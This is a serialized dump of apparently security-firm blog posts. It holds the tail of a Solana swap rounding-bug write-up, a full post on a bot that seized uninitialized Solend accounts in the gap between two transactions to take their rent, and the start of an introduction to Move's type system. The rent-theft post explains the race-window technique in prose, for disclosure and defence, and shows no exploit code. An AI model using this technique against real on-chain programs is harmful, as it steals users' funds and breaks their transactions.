8918,8922,8926,8930,8934,8938],{"type":25,"tag":216,"props":8842,"children":8843},{"style":6953},[8844],{"type":31,"value":8276},{"type":25,"tag":216,"props":8846,"children":8847},{"style":6953},[8848],{"type":31,"value":7116},{"type":25,"tag":216,"props":8850,"children":8851},{"style":7047},[8852],{"type":31,"value":8853},"checked_div",{"type":25,"tag":216,"props":8855,"children":8856},{"style":6964},[8857],{"type":31,"value":1850},{"type":25,"tag":216,"props":8859,"children":8860},{"style":7047},[8861],{"type":31,"value":7130},{"type":25,"tag":216,"props":8863,"children":8864},{"style":6964},[8865],{"type":31,"value":1850},{"type":25,"tag":216,"props":8867,"children":8868},{"style":6953},[8869],{"type":31,"value":7059},{"type":25,"tag":216,"props":8871,"children":8872},{"style":6947},[8873],{"type":31,"value":7064},{"type":25,"tag":216,"props":8875,"children":8876},{"style":6964},[8877],{"type":31,"value":7026},{"type":25,"tag":216,"props":8879,"children":8880},{"style":6989},[8881],{"type":31,"value":331},{"type":25,"tag":216,"props":8883,"children":8884},{"style":6964},[8885],{"type":31,"value":1888},{"type":25,"tag":216,"props":8887,"children":8888},{"style":6953},[8889],{"type":31,"value":7081},{"type":25,"tag":216,"props":8891,"children":8892},{"style":7047},[8893],{"type":31,"value":7086},{"type":25,"tag":216,"props":8895,"children":8896},{"style":6964},[8897],{"type":31,"value":1850},{"type":25,"tag":216,"props":8899,"children":8900},{"style":6947},[8901],{"type":31,"value":7171},{"type":25,"tag":216,"props":8903,"children":8904},{"style":6964},[8905],{"type":31,"value":1888},{"type":25,"tag":216,"props":8907,"children":8908},{"style":6953},[8909],{"type":31,"value":7081},{"type":25,"tag":216,"props":8911,"children":8912},{"style":7047},[8913],{"type":31,"value":7184},{"type":25,"tag":216,"props":8915,"children":8916},{"style":6964},[8917],{"type":31,"value":1850},{"type":25,"tag":216,"props":8919,"children":8920},{"style":6947},[8921],{"type":31,"value":7193},{"type":25,"tag":216,"props":8923,"children":8924},{"style":6964},[8925],{"type":31,"value":1888},{"type":25,"tag":216,"props":8927,"children":8928},{"style":6953},[8929],{"type":31,"value":604},{"type":25,"tag":216,"props":8931,"children":8932},{"style":6964},[8933],{"type":31,"value":1888},{"type":25,"tag":216,"props":8935,"children":8936},{"style":6953},[8937],{"type":31,"value":604},{"type":25,"tag":216,"props":8939,"children":8940},{"style":6964},[8941],{"type":31,"value":6967},{"type":25,"tag":216,"props":8943,"children":8944},{"class":6922,"line":7257},[8945,8949,8953,8957,8961,8965],{"type":25,"tag":216,"props":8946,"children":8947},{"style":6953},[8948],{"type":31,"value":8276},{"type":25,"tag":216,"props":8950,"children":8951},{"style":6973},[8952],{"type":31,"value":7222},{"type":25,"tag":216,"props":8954,"children":8955},{"style":6947},[8956],{"type":31,"value":6950},{"type":25,"tag":216,"props":8958,"children":8959},{"style":6953},[8960],{"type":31,"value":7232},{"type":25,"tag":216,"props":8962,"children":8963},{"style":6947},[8964],{"type":31,"value":8669},{"type":25,"tag":216,"props":8966,"children":8967},{"style":6964},[8968],{"type":31,"value":7241},{"type":25,"tag":216,"props":8970,"children":8971},{"class":6922,"line":7275},[8972,8976,8980,8984,8988,8992,8996,9000,9004,9008,9012,9016,9020,9024,9028,9032,9036,9040,9044,9048,9052,9056,9060],{"type":25,"tag":216,"props":8973,"children":8974},{"style":6953},[8975],{"type":31,"value":3539},{"type":25,"tag":216,"props":8977,"children":8978},{"style":6936},[8979],{"type":31,"value":7011},{"type":25,"tag":216,"props":8981,"children":8982},{"style":6964},[8983],{"type":31,"value":7016},{"type":25,"tag":216,"props":8985,"children":8986},{"style":6947},[8987],{"type":31,"value":7021},{"type":25,"tag":216,"props":8989,"children":8990},{"style":6964},[8991],{"type":31,"value":7026},{"type":25,"tag":216,"props":8993,"children":8994},{"style":6947},[8995],{"type":31,"value":7031},{"type":25,"tag":216,"props":8997,"children":8998},{"style":6964},[8999],{"type":31,"value":7036},{"type":25,"tag":216,"props":9001,"children":9002},{"style":6953},[9003],{"type":31,"value":266},{"type":25,"tag":216,"props":9005,"children":9006},{"style":6964},[9007],{"type":31,"value":7016},{"type":25,"tag":216,"props":9009,"children":9010},{"style":7047},[9011],{"type":31,"value":7050},{"type":25,"tag":216,"props":9013,"children":9014},{"style":6964},[9015],{"type":31,"value":1850},{"type":25,"tag":216,"props":9017,"children":9018},{"style":6953},[9019],{"type":31,"value":7059},{"type":25,"tag":216,"props":9021,"children":9022},{"style":6947},[9023],{"type":31,"value":7064},{"type":25,"tag":216,"props":9025,"children":9026},{"style":6964},[9027],{"type":31,"value":7026},{"type":25,"tag":216,"props":9029,"children":9030},{"style":6989},[9031],{"type":31,"value":331},{"type":25,"tag":216,"props":9033,"children":9034},{"style":6964},[9035],{"type":31,"value":1888},{"type":25,"tag":216,"props":9037,"children":9038},{"style":6953},[9039],{"type":31,"value":7081},{"type":25,"tag":216,"props":9041,"children":9042},{"style":7047},[9043],{"type":31,"value":7086},{"type":25,"tag":216,"props":9045,"children":9046},{"style":6964},[9047],{"type":31,"value":1850},{"type":25,"tag":216,"props":9049,"children":9050},{"style":6947},[9051],{"type":31,"value":2254},{"type":25,"tag":216,"props":9053,"children":9054},{"style":6964},[9055],{"type":31,"value":1888},{"type":25,"tag":216,"props":9057,"children":9058},{"style":6953},[9059],{"type":31,"value":604},{"type":25,"tag":216,"props":9061,"children":9062},{"style":6964},[9063],{"type":31,"value":7107},{"type":25,"tag":216,"props":9065,"children":9066},{"class":6922,"line":7296},[9067,9071,9075,9079,9083,9087,9091,9095,9099,9103,9107,9111,9115,9119,9123,9127,9131,9135,9139,9143,9147,9151,9155,9159,9163],{"type":25,"tag":216,"props":9068,"children":9069},{"style":6953},[9070],{"type":31,"value":3539},{"type":25,"tag":216,"props":9072,"children":9073},{"style":6953},[9074],{"type":31,"value":7116},{"type":25,"tag":216,"props":9076,"children":9077},{"style":7047},[9078],{"type":31,"value":7121},{"type":25,"tag":216,"props":9080,"children":9081},{"style":6964},[9082],{"type":31,"value":1850},{"type":25,"tag":216,"props":9084,"children":9085},{"style":7047},[9086],{"type":31,"value":7130},{"type":25,"tag":216,"props":9088,"children":9089},{"style":6964},[9090],{"type":31,"value":1850},{"type":25,"tag":216,"props":9092,"children":9093},{"style":6953},[9094],{"type":31,"value":7059},{"type":25,"tag":216,"props":9096,"children":9097},{"style":6947},[9098],{"type":31,"value":7064},{"type":25,"tag":216,"props":9100,"children":9101},{"style":6964},[9102],{"type":31,"value":7026},{"type":25,"tag":216,"props":9104,"children":9105},{"style":6989},[9106],{"type":31,"value":331},{"type":25,"tag":216,"props":9108,"children":9109},{"style":6964},[9110],{"type":31,"value":1888},{"type":25,"tag":216,"props":9112,"children":9113},{"style":6953},[9114],{"type":31,"value":7081},{"type":25,"tag":216,"props":9116,"children":9117},{"style":7047},[9118],{"type":31,"value":7086},{"type":25,"tag":216,"props":9120,"children":9121},{"style":6964},[9122],{"type":31,"value":1850},{"type":25,"tag":216,"props":9124,"children":9125},{"style":6947},[9126],{"type":31,"value":7171},{"type":25,"tag":216,"props":9128,"children":9129},{"style":6964},[9130],{"type":31,"value":1888},{"type":25,"tag":216,"props":9132,"children":9133},{"style":6953},[9134],{"type":31,"value":7081},{"type":25,"tag":216,"props":9136,"children":9137},{"style":7047},[9138],{"type":31,"value":7184},{"type":25,"tag":216,"props":9140,"children":9141},{"style":6964},[9142],{"type":31,"value":1850},{"type":25,"tag":216,"props":9144,"children":9145},{"style":6947},[9146],{"type":31,"value":7193},{"type":25,"tag":216,"props":9148,"children":9149},{"style":6964},[9150],{"type":31,"value":1888},{"type":25,"tag":216,"props":9152,"children":9153},{"style":6953},[9154],{"type":31,"value":604},{"type":25,"tag":216,"props":9156,"children":9157},{"style":6964},[9158],{"type":31,"value":1888},{"type":25,"tag":216,"props":9160,"children":9161},{"style":6953},[9162],{"type":31,"value":604},{"type":25,"tag":216,"props":9164,"children":9165},{"style":6964},[9166],{"type":31,"value":6967},{"type":25,"tag":216,"props":9168,"children":9169},{"class":6922,"line":7305},[9170,9174,9178,9182,9186,9190],{"type":25,"tag":216,"props":9171,"children":9172},{"style":6953},[9173],{"type":31,"value":3539},{"type":25,"tag":216,"props":9175,"children":9176},{"style":6973},[9177],{"type":31,"value":7222},{"type":25,"tag":216,"props":9179,"children":9180},{"style":6947},[9181],{"type":31,"value":7227},{"type":25,"tag":216,"props":9183,"children":9184},{"style":6953},[9185],{"type":31,"value":7232},{"type":25,"tag":216,"props":9187,"children":9188},{"style":6947},[9189],{"type":31,"value":6950},{"type":25,"tag":216,"props":9191,"children":9192},{"style":6964},[9193],{"type":31,"value":7241},{"type":25,"tag":216,"props":9195,"children":9196},{"class":6922,"line":7557},[9197,9202],{"type":25,"tag":216,"props":9198,"children":9199},{"style":6973},[9200],{"type":31,"value":9201},"             break",{"type":25,"tag":216,"props":9203,"children":9204},{"style":6964},[9205],{"type":31,"value":6967},{"type":25,"tag":216,"props":9207,"children":9208},{"class":6922,"line":7574},[9209,9213,9217,9221],{"type":25,"tag":216,"props":9210,"children":9211},{"style":6953},[9212],{"type":31,"value":3539},{"type":25,"tag":216,"props":9214,"children":9215},{"style":6964},[9216],{"type":31,"value":7263},{"type":25,"tag":216,"props":9218,"children":9219},{"style":6973},[9220],{"type":31,"value":7268},{"type":25,"tag":216,"props":9222,"children":9223},{"style":6964},[9224],{"type":31,"value":7241},{"type":25,"tag":216,"props":9226,"children":9227},{"class":6922,"line":7591},[9228,9232,9236,9240,9244],{"type":25,"tag":216,"props":9229,"children":9230},{"style":6953},[9231],{"type":31,"value":3539},{"type":25,"tag":216,"props":9233,"children":9234},{"style":6947},[9235],{"type":31,"value":7281},{"type":25,"tag":216,"props":9237,"children":9238},{"style":6953},[9239],{"type":31,"value":6956},{"type":25,"tag":216,"props":9241,"children":9242},{"style":6947},[9243],{"type":31,"value":7227},{"type":25,"tag":216,"props":9245,"children":9246},{"style":6964},[9247],{"type":31,"value":6967},{"type":25,"tag":216,"props":9249,"children":9250},{"class":6922,"line":7604},[9251],{"type":25,"tag":216,"props":9252,"children":9253},{"style":6964},[9254],{"type":31,"value":9255},"         }\n",{"type":25,"tag":26,"props":9257,"children":9259},{"id":9258},"closing-thoughts",[9260],{"type":31,"value":9261},"Closing Thoughts",{"type":25,"tag":38,"props":9263,"children":9264},{},[9265],{"type":31,"value":9266},"This is a good example of how messing around and interacting with the ecosystem can lead to unexpected bugs. We found this, not as a result of active security research, but as part of our work in MEV and trading.",{"type":25,"tag":38,"props":9268,"children":9269},{},[9270,9272,9278],{"type":31,"value":9271},"Another interesting takeaway is that ",{"type":25,"tag":9273,"props":9274,"children":9275},"strong",{},[9276],{"type":31,"value":9277},"fuzzing can give a false sense of security",{"type":31,"value":9279},". Prior to our report, Saber had already deployed comprehensive fuzzers for their swap implementation. A researcher looking at code coverage alone might come to the incorrect conclusion that such extensively fuzzed code couldn't possibly have a vulnerability.",{"type":25,"tag":38,"props":9281,"children":9282},{},[9283,9285,9292],{"type":31,"value":9284},"One can see parallels to traditional security, as with Google Project Zero's ",{"type":25,"tag":162,"props":9286,"children":9289},{"href":9287,"rel":9288},"https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html",[166],[9290],{"type":31,"value":9291},"port-mortem of the NSS overflow",{"type":31,"value":179},{"type":25,"tag":38,"props":9294,"children":9295},{},[9296],{"type":25,"tag":6467,"props":9297,"children":9299},{"alt":7,"src":9298},"/posts/spl-swap/p0.png",[],{"type":25,"tag":38,"props":9301,"children":9302},{},[9303],{"type":31,"value":9304},"A heavily fuzzed method had a trivial buffer overflow due to an arbitrary size limit on the input data. Implict assumptions can often undermine security.",{"type":25,"tag":38,"props":9306,"children":9307},{},[9308],{"type":31,"value":9309},"Especially with regard to onchain programs, it's important to consider what actually is a \"vulnerability\". Getting tokens from nothing is a more obvious example, but more subtle bugs can arise with increasingly complex defi interactions. Economic invariants are much harder to detect than say, memory corruption.",{"type":25,"tag":38,"props":9311,"children":9312},{},[9313],{"type":31,"value":9314},"A comprehensive evaluation of smart contracts relies on a deep understanding of economic implications within the Solana ecosystem.",{"type":25,"tag":9316,"props":9317,"children":9318},"style",{},[9319],{"type":31,"value":9320},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":6769,"depth":6769,"links":9322},[9323,9324,9325,9326],{"id":6853,"depth":6769,"text":6856},{"id":7897,"depth":6769,"text":7900},{"id":8173,"depth":6769,"text":8176},{"id":9258,"depth":6769,"text":9261},"content:blog:2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding",{"_path":9331,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":9332,"description":9333,"image":9334,"date":9338,"isFeatured":16,"onBlogPage":16,"tags":9339,"body":9340,"_type":6798,"_id":9663,"_source":6800,"_file":9664,"_stem":9665,"_extension":6803},"/blog/2022-08-19-solend-rent-thief","The Story of the Curious Rent Thief","A tale of pickpockets preying on the Solana ecosystem. Read our investigation into the persistent theft of rent from uninitialized accounts. This is the story of the Solend rent thief.",{"src":9335,"width":9336,"height":9337},"/posts/rent-thief/title.jpg",970,826,"2022-08-19",[6815,6816],{"type":22,"children":9341,"toc":9656},[9342,9347,9353,9358,9363,9368,9374,9387,9434,9464,9473,9478,9483,9488,9494,9507,9523,9528,9533,9548,9552,9557,9572,9579,9584,9594,9601,9605,9610,9616,9621,9626,9631,9637,9642],{"type":25,"tag":38,"props":9343,"children":9344},{},[9345],{"type":31,"value":9346},"Recently, there’s been a rent thief. This bot steals money from uninitialized accounts across the Solana ecosystem, claiming and profiting from the rent. The Solend team noticed the bot when it attempted an attack on the new permissionless pools that are being developed (to be clear, funds stored in the main Solend protocol are completely unaffected). Let's dig into how rent thieving works by doing a case study on an attack to one of the permissionless pools.",{"type":25,"tag":26,"props":9348,"children":9350},{"id":9349},"background",[9351],{"type":31,"value":9352},"Background",{"type":25,"tag":38,"props":9354,"children":9355},{},[9356],{"type":31,"value":9357},"To understand how this exploit works, we first have to understand a bit about how rent works in Solana.",{"type":25,"tag":38,"props":9359,"children":9360},{},[9361],{"type":31,"value":9362},"Since accounts can store data that every validator needs to download, Solana charges a certain amount of rent based on the amount of data. However, accounts that have enough for 2 years of rent payments are considered rent-exempt as long as their balance never drops below the threshold. Fortunately, rent is very cheap, so it's not hard to make an account rent-exempt.",{"type":25,"tag":38,"props":9364,"children":9365},{},[9366],{"type":31,"value":9367},"As such, when creating new accounts, most programs will need to transfer some SOL into the new account to make it rent-exempt.",{"type":25,"tag":26,"props":9369,"children":9371},{"id":9370},"the-exploit",[9372],{"type":31,"value":9373},"The Exploit",{"type":25,"tag":38,"props":9375,"children":9376},{},[9377,9379,9385],{"type":31,"value":9378},"New reserves (also known as assets) are added to a Solend pool by calling the ",{"type":25,"tag":82,"props":9380,"children":9382},{"className":9381},[],[9383],{"type":31,"value":9384},"init_reserve",{"type":31,"value":9386}," function, which creates 6 new accounts to store data about the reserve:",{"type":25,"tag":6711,"props":9388,"children":9389},{},[9390,9395,9400,9405,9416,9421],{"type":25,"tag":2043,"props":9391,"children":9392},{},[9393],{"type":31,"value":9394},"reserve detail - stores information about the reserve e.g liquidity mint, mint decimals, oracles, configs, etc.",{"type":25,"tag":2043,"props":9396,"children":9397},{},[9398],{"type":31,"value":9399},"reserve liquidity token account - holds deposited tokens",{"type":25,"tag":2043,"props":9401,"children":9402},{},[9403],{"type":31,"value":9404},"fee receiver token account - account which will receive origination fees on borrows",{"type":25,"tag":2043,"props":9406,"children":9407},{},[9408,9410],{"type":31,"value":9409},"reserve collateral mint account - deposit receipt token, also known as ",{"type":25,"tag":82,"props":9411,"children":9413},{"className":9412},[],[9414],{"type":31,"value":9415},"cTokens",{"type":25,"tag":2043,"props":9417,"children":9418},{},[9419],{"type":31,"value":9420},"reserve collateral token account - holds users' collateral tokens",{"type":25,"tag":2043,"props":9422,"children":9423},{},[9424,9426,9432],{"type":31,"value":9425},"creator collateral token account - creator's ",{"type":25,"tag":82,"props":9427,"children":9429},{"className":9428},[],[9430],{"type":31,"value":9431},"cToken",{"type":31,"value":9433}," account",{"type":25,"tag":38,"props":9435,"children":9436},{},[9437,9439,9444,9446,9451,9452,9457,9459],{"type":31,"value":9438},"Account creation and initialization are ",{"type":25,"tag":64,"props":9440,"children":9441},{},[9442],{"type":31,"value":9443},"usually",{"type":31,"value":9445}," done within the same transactions. However, due to Solana's transaction size limit of 1232 bytes, the creation and initialization of these 6 accounts had to be separated into 2 transactions, creation and initialization. Here's what a call to ",{"type":25,"tag":82,"props":9447,"children":9449},{"className":9448},[],[9450],{"type":31,"value":9384},{"type":31,"value":1680},{"type":25,"tag":64,"props":9453,"children":9454},{},[9455],{"type":31,"value":9456},"supposed",{"type":31,"value":9458}," to look like:\n",{"type":25,"tag":6467,"props":9460,"children":9463},{"src":9461,"alt":9462},"/posts/rent-thief/transacdiagram.png","drawing",[],{"type":25,"tag":38,"props":9465,"children":9466},{},[9467,9469],{"type":31,"value":9468},"Notice anything amiss? In between the two transactions, the account has rent money but no owner. This is where the rent thief comes in to snatch the account, along with its rent:\n",{"type":25,"tag":6467,"props":9470,"children":9472},{"src":9471,"alt":9462},"/posts/rent-thief/attacktransac.png",[],{"type":25,"tag":38,"props":9474,"children":9475},{},[9476],{"type":31,"value":9477},"Since there was a roughly 40 second (50 slot) window in between the two transactions, such an attack was very consistent.",{"type":25,"tag":38,"props":9479,"children":9480},{},[9481],{"type":31,"value":9482},"Fortunately, rent is relatively cheap so the entire attack only extracts about 0.0082 SOL every iteration (4 token accounts each worth around 0.002 SOL), which is around 28 cents at the time of writing this article.",{"type":25,"tag":38,"props":9484,"children":9485},{},[9486],{"type":31,"value":9487},"Despite this lost cost, this is pretty annoying...",{"type":25,"tag":26,"props":9489,"children":9491},{"id":9490},"example",[9492],{"type":31,"value":9493},"Example",{"type":25,"tag":38,"props":9495,"children":9496},{},[9497,9499,9506],{"type":31,"value":9498},"Let's take a look at ",{"type":25,"tag":162,"props":9500,"children":9503},{"href":9501,"rel":9502},"https://explorer.solana.com/address/2PUTo74Vbt9fXVoTywjTFZNnWGckWS98HnruXvZJaj4N",[166],[9504],{"type":31,"value":9505},"a real attack",{"type":31,"value":179},{"type":25,"tag":38,"props":9508,"children":9509},{},[9510,9517,9519],{"type":25,"tag":162,"props":9511,"children":9514},{"href":9512,"rel":9513},"https://explorer.solana.com/tx/9yon9Av2sBq78bZ92Pa28p8gef5MUEQL3sBLGVzxK3RNGYsN2nLnTrbqS1wMCvJdinKE8CC9SwCuUYuNBwrNFNy",[166],[9515],{"type":31,"value":9516},"Transaction 1",{"type":31,"value":9518},":\n",{"type":25,"tag":6467,"props":9520,"children":9522},{"alt":7,"src":9521},"https://i.imgur.com/xJvIwgc.png",[],{"type":25,"tag":38,"props":9524,"children":9525},{},[9526],{"type":31,"value":9527},"(...more accounts truncated)",{"type":25,"tag":38,"props":9529,"children":9530},{},[9531],{"type":31,"value":9532},"The developer creates a couple accounts and transfers enough SOL for them to be rent-exempt. This took place in slot 136,580,113.",{"type":25,"tag":38,"props":9534,"children":9535},{},[9536,9543,9544],{"type":25,"tag":162,"props":9537,"children":9540},{"href":9538,"rel":9539},"https://explorer.solana.com/tx/22beQSDReFGK4KAgarAz4MbibpxaFHiARd3yaCDZ4wmKSNoTcxmKMp6uRNA2CY4xAAZVZZCDg522aJ7jXftyhtSE",[166],[9541],{"type":31,"value":9542},"Attacker's Transaction",{"type":31,"value":9518},{"type":25,"tag":6467,"props":9545,"children":9547},{"alt":7,"src":9546},"https://i.imgur.com/CpSKuL3.png",[],{"type":25,"tag":38,"props":9549,"children":9550},{},[9551],{"type":31,"value":9527},{"type":25,"tag":38,"props":9553,"children":9554},{},[9555],{"type":31,"value":9556},"As detailed before, the attacker takes ownership of the newly created accounts. This took place in slot 136,580,154, which is 41 slots (29 seconds) after the initial transaction.",{"type":25,"tag":38,"props":9558,"children":9559},{},[9560,9567,9568],{"type":25,"tag":162,"props":9561,"children":9564},{"href":9562,"rel":9563},"https://explorer.solana.com/tx/beYo1YBCa4fQ8swdJchx9s4qtgDQV4oVSEqwAX7UpHan4U4Jsv1oxY2V2ZxE77pBQHzYwV4gCXpDDKTgM7kBT4y",[166],[9565],{"type":31,"value":9566},"Transaction 2",{"type":31,"value":9518},{"type":25,"tag":6467,"props":9569,"children":9571},{"alt":7,"src":9570},"https://i.imgur.com/of0GIdw.png",[],{"type":25,"tag":38,"props":9573,"children":9574},{},[9575],{"type":25,"tag":6467,"props":9576,"children":9578},{"alt":7,"src":9577},"https://i.imgur.com/0STSyv8.png",[],{"type":25,"tag":38,"props":9580,"children":9581},{},[9582],{"type":31,"value":9583},"The developer attempts to take ownership of the account, but it fails with the error \"account or token already in use\" since the attacker took ownership of it. This took place in slot 136,580,167, which is 13 slots (9 seconds) after the attacker's transaction. In total, that's a 54 slot-gap (38 seconds) between the two Solend transactions.",{"type":25,"tag":38,"props":9585,"children":9586},{},[9587,9593],{"type":25,"tag":162,"props":9588,"children":9591},{"href":9589,"rel":9590},"https://explorer.solana.com/tx/3D45bCbbeSEaigz3RX6GRKuoDSok3FHMi5Z2N5HDXcPjqMzu3Qx5iEoXh56RWg1mn7w9ZuZifD91n1DwnPjdaW2G",[166],[9592],{"type":31,"value":9542},{"type":31,"value":1472},{"type":25,"tag":38,"props":9595,"children":9596},{},[9597],{"type":25,"tag":6467,"props":9598,"children":9600},{"alt":7,"src":9599},"https://i.imgur.com/AmSPdmy.png",[],{"type":25,"tag":38,"props":9602,"children":9603},{},[9604],{"type":31,"value":9527},{"type":25,"tag":38,"props":9606,"children":9607},{},[9608],{"type":31,"value":9609},"Now that the attack is over, the attacker closes the accounts, transferring the rent money to themselves. The total money stolen during this attack was 0.00815212 SOL.",{"type":25,"tag":26,"props":9611,"children":9613},{"id":9612},"impact",[9614],{"type":31,"value":9615},"Impact",{"type":25,"tag":38,"props":9617,"children":9618},{},[9619],{"type":31,"value":9620},"Rent-thieving attacks don't steal much money.",{"type":25,"tag":38,"props":9622,"children":9623},{},[9624],{"type":31,"value":9625},"They can only make a small profit very infrequently as Solana rent is cheap and there are only a handful of large services that separate account creation and initialization. In addition, this stratedgy doesn't scale well, since such non-atomic account creation is relatively infrequent.",{"type":25,"tag":38,"props":9627,"children":9628},{},[9629],{"type":31,"value":9630},"However, it's still obnoxious even if the monetary impact is minimal. Transactions will fail and need to be remade, impacting usability.",{"type":25,"tag":26,"props":9632,"children":9634},{"id":9633},"solution",[9635],{"type":31,"value":9636},"Solution",{"type":25,"tag":38,"props":9638,"children":9639},{},[9640],{"type":31,"value":9641},"As a temporary stopgap, Solend refactored their codebase to lower the 40 second delay between transactions to around 15 seconds (20 slots), making an attack much more difficult and inconsistent.",{"type":25,"tag":38,"props":9643,"children":9644},{},[9645,9647,9654],{"type":31,"value":9646},"As a more permenant solution, Solend implemented ",{"type":25,"tag":162,"props":9648,"children":9651},{"href":9649,"rel":9650},"https://explorer.solana.com/tx/3DR74oQh966HbozLPYFqTgCmQWbUNSBkjUcEs7CuWxMPNxM3mBzqH7Gqu1mVRBRxNSTWJBcJkTnCzmoqD6kPYMXE?cluster=devnet",[166],[9652],{"type":31,"value":9653},"an onchain program",{"type":31,"value":9655}," which handles account creation, allowing them to fit all the relevant instructions into one transaction.",{"title":7,"searchDepth":6769,"depth":6769,"links":9657},[9658,9659,9660,9661,9662],{"id":9349,"depth":6769,"text":9352},{"id":9370,"depth":6769,"text":9373},{"id":9490,"depth":6769,"text":9493},{"id":9612,"depth":6769,"text":9615},{"id":9633,"depth":6769,"text":9636},"content:blog:2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief",{"_path":9667,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":9668,"description":9669,"author":9670,"image":9671,"date":9675,"isFeatured":16,"onBlogPage":16,"body":9676,"_type":6798,"_id":13212,"_source":6800,"_file":13213,"_stem":13214,"_extension":6803},"/blog/2022-09-06-move-introduction","Move: An Auditor's Introduction","What actually makes Move secure? A discussion of Move's typing system and formal verification.","robert",{"src":9672,"height":9673,"width":9674},"/posts/move-intro/title.jpg",1221,1400,"2022-09-06",{"type":22,"children":9677,"toc":13207},[9678,9683,9688,9707,9713,9725,9824,9832,9951,9959,9981,10134,10139,10397,10419,10454,10459,10479,10484,10495,10507,10719,10731,10745,10758,11015,11027,11249,11254,11281,11427,11446,11451,11716,11728,11733,11746,11752,11757,11762,11774,11788,11793,11892,11904,11917,12191,12196,12208,12213,12267,12287,12292,13176,13180,13185,13190,13203],{"type":25,"tag":38,"props":9679,"children":9680},{},[9681],{"type":31,"value":9682},"As part of our work, we seek to understand how to eliminate vulnerability classes. Designing safer languages enables developers to write code with confidence. How exactly does Move lend itself to safer programming practices? What can we learn from Move to generalize secure design principles for other execution environments?",{"type":25,"tag":38,"props":9684,"children":9685},{},[9686],{"type":31,"value":9687},"Lately, there appears to be many buzzwords floating around. Formal verification, type based safety, \"rust but for blockchain\".",{"type":25,"tag":38,"props":9689,"children":9690},{},[9691,9693,9698,9700,9705],{"type":31,"value":9692},"In this piece I'll seek to discuss exactly ",{"type":25,"tag":64,"props":9694,"children":9695},{},[9696],{"type":31,"value":9697},"how",{"type":31,"value":9699}," move lends itself to more secure programming practices, potential shortcomings, and practical design tips for protocol developers looking to build ",{"type":25,"tag":64,"props":9701,"children":9702},{},[9703],{"type":31,"value":9704},"structurally",{"type":31,"value":9706}," safer programs.",{"type":25,"tag":26,"props":9708,"children":9710},{"id":9709},"types",[9711],{"type":31,"value":9712},"Types",{"type":25,"tag":38,"props":9714,"children":9715},{},[9716,9718,9724],{"type":31,"value":9717},"One of the key selling points of Move is the use of typed resources. Aptos and Sui have slight variations in how they materialize this pattern, but as an example take ",{"type":25,"tag":82,"props":9719,"children":9721},{"className":9720},[],[9722],{"type":31,"value":9723},"coin.move",{"type":31,"value":179},{"type":25,"tag":206,"props":9726,"children":9728},{"className":6915,"code":9727,"language":6914,"meta":7,"style":7},"  /// Main structure representing a coin/token in an account's custody.\n  struct Coin\u003Cphantom CoinType> has store {\n      /// Amount of coin this address has.\n      value: u64,\n  }\n",[9729],{"type":25,"tag":82,"props":9730,"children":9731},{"__ignoreMap":7},[9732,9740,9787,9795,9816],{"type":25,"tag":216,"props":9733,"children":9734},{"class":6922,"line":6923},[9735],{"type":25,"tag":216,"props":9736,"children":9737},{"style":6927},[9738],{"type":31,"value":9739},"  /// Main structure representing a coin/token in an account's custody.\n",{"type":25,"tag":216,"props":9741,"children":9742},{"class":6922,"line":6769},[9743,9748,9753,9758,9763,9768,9773,9778,9783],{"type":25,"tag":216,"props":9744,"children":9745},{"style":6936},[9746],{"type":31,"value":9747},"  struct",{"type":25,"tag":216,"props":9749,"children":9750},{"style":7375},[9751],{"type":31,"value":9752}," Coin",{"type":25,"tag":216,"props":9754,"children":9755},{"style":6964},[9756],{"type":31,"value":9757},"\u003C",{"type":25,"tag":216,"props":9759,"children":9760},{"style":6947},[9761],{"type":31,"value":9762},"phantom",{"type":25,"tag":216,"props":9764,"children":9765},{"style":7375},[9766],{"type":31,"value":9767}," CoinType",{"type":25,"tag":216,"props":9769,"children":9770},{"style":6964},[9771],{"type":31,"value":9772},"> ",{"type":25,"tag":216,"props":9774,"children":9775},{"style":6947},[9776],{"type":31,"value":9777},"has",{"type":25,"tag":216,"props":9779,"children":9780},{"style":6947},[9781],{"type":31,"value":9782}," store",{"type":25,"tag":216,"props":9784,"children":9785},{"style":6964},[9786],{"type":31,"value":7241},{"type":25,"tag":216,"props":9788,"children":9789},{"class":6922,"line":6778},[9790],{"type":25,"tag":216,"props":9791,"children":9792},{"style":6927},[9793],{"type":31,"value":9794},"      /// Amount of coin this address has.\n",{"type":25,"tag":216,"props":9796,"children":9797},{"class":6922,"line":7005},[9798,9803,9807,9812],{"type":25,"tag":216,"props":9799,"children":9800},{"style":6947},[9801],{"type":31,"value":9802},"      value",{"type":25,"tag":216,"props":9804,"children":9805},{"style":6953},[9806],{"type":31,"value":1472},{"type":25,"tag":216,"props":9808,"children":9809},{"style":7375},[9810],{"type":31,"value":9811}," u64",{"type":25,"tag":216,"props":9813,"children":9814},{"style":6964},[9815],{"type":31,"value":7465},{"type":25,"tag":216,"props":9817,"children":9818},{"class":6922,"line":7110},[9819],{"type":25,"tag":216,"props":9820,"children":9821},{"style":6964},[9822],{"type":31,"value":9823},"  }\n",{"type":25,"tag":38,"props":9825,"children":9826},{},[9827],{"type":25,"tag":64,"props":9828,"children":9829},{},[9830],{"type":31,"value":9831},"aptos",{"type":25,"tag":206,"props":9833,"children":9835},{"className":6915,"code":9834,"language":6914,"meta":7,"style":7},"  /// A coin of type `T` worth `value`. Transferable and storable\n  struct Coin\u003Cphantom T> has key, store {\n      id: UID,\n      balance: Balance\u003CT>\n  }\n",[9836],{"type":25,"tag":82,"props":9837,"children":9838},{"__ignoreMap":7},[9839,9847,9897,9914,9944],{"type":25,"tag":216,"props":9840,"children":9841},{"class":6922,"line":6923},[9842],{"type":25,"tag":216,"props":9843,"children":9844},{"style":6927},[9845],{"type":31,"value":9846},"  /// A coin of type `T` worth `value`. Transferable and 